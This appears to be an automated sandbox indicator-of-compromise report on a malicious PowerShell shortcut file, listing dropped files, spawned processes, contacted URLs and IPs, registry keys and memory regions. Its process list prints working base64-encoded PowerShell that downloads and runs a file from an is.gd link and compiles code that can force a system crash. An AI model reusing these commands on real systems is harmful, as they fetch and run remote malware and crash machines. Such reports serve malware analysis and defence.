IOC Report
Windows PowerShell.lnk

loading gif

Files

File Path
Type
Category
Malicious
Windows PowerShell.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Fri Feb 16 20:44:00 2024, mtime=Thu Oct 3 08:53:00 2024, atime=Fri Feb 16 20:44:00 2024, length=450560, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\.cmd
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\RES7AF.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 5 14:36:05 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4pibzff.mpr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgu50p1z.eqy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xf40d02h.aqo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs
Unicode text, UTF-8 (with BOM) text, with very long lines (972), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.out
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
modified
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SPB8BUCU6W9QDUKDVM45.temp
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 97
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 98
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 99
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 100
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 101
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 102
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 103
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 104
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 105
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 106
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 107
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 108
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 109
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 110
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 111
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 112
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 113
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 114
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 115
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 116
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 117
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 118
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 119
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 120
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 121
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 122
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 65
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 66
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 67
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 68
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 69
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 70
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 71
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 72
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 73
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 74
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 75
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 76
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 77
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 78
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 79
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 80
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 81
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 82
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 83
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 84
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 85
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 86
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 87
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 88
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 89
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 90
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 48
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 49
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 50
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 51
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 52
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 53
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 54
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 55
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 56
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 57
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 123
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 125
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 63
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 58
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 46
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 61
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 44
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 95
malicious
C:\Windows\System32\cmd.exe
cmd /c exit 45
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUABhAHMAcwBUAGgAcgB1ACAALQBDAG8AbQBwAGkAbABlAHIAUABhAHIAYQBtAGUAdABlAHIAcwAgACQAYwA7AGkAZgAoACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AIAAxACAALQBNAGEAeAAgADcAKQAgAC0AZQBxACAAMQApAHsAWwBYAF0AOgA6AFMAaABvAHQAKAApAH0AUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIA
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
There are 67 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://is.gd/jwr7JD
104.25.234.53
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
https://github.com/user-attachments/files/17251016/powershell.zip
140.82.121.4
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://is.gd/jwr7JD
104.25.234.53
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 7 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
github.com
140.82.121.4
is.gd
104.25.234.53
objects.githubusercontent.com
185.199.111.133

IPs

IP
Domain
Country
Malicious
104.25.234.53
is.gd
United States
140.82.121.4
github.com
United States
185.199.111.133
objects.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125D9D0000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
21475E70000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
7FFD34750000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B8B0000
heap
page read and write
2145B920000
heap
page read and write
1E6E9290000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125DA74000
heap
page read and write
2125BFBD000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E338000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1C98FF7000
stack
page read and write
1E6E91D4000
heap
page read and write
7FFD347B0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
2125C170000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E324000
direct allocation
page read and write
D1E0079000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
21475EC3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF80000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B8DD000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
21475BD2000
unkown
page readonly
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145D4F0000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
DB985FF000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34680000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
D1DFC73000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145B7B0000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2146D8BE000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
2125DA70000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34670000
trusted library allocation
page read and write
7FFD34453000
trusted library allocation
page execute and read and write
2145D305000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145F4C7000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C9000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E2F0000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
214759E6000
heap
page read and write
2146D850000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DFE7D000
stack
page read and write
1E6E91D4000
heap
page read and write
7FFD34640000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
2145BAC0000
heap
page execute and read and write
1E6E91C5000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
214759B5000
heap
page read and write
1E6E91D4000
heap
page read and write
2145BA80000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
2145BA30000
trusted library allocation
page read and write
2145BB50000
heap
page read and write
21475BD0000
unkown
page readonly
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145F3FE000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DFD7F000
stack
page read and write
1E6E91C3000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BFCD000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7DF4C30E0000
trusted library allocation
page execute and read and write
2125BF80000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34770000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
2125E310000
direct allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91A8000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
16B36FB000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E00F6000
stack
page read and write
1E6E91D4000
heap
page read and write
2145F4CD000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D5000
heap
page read and write
7FFD346F0000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
16B38FF000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34610000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
D1E047B000
stack
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145BA60000
heap
page readonly
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34570000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
D1DFFFE000
stack
page read and write
7FFD34740000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
7FFD34536000
trusted library allocation
page execute and read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C1000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D7000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91C3000
heap
page read and write
2172EDE0000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2125BF76000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C5000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C3000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91C6000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
2145BB03000
trusted library allocation
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
1E6E91D4000
heap
page read and write
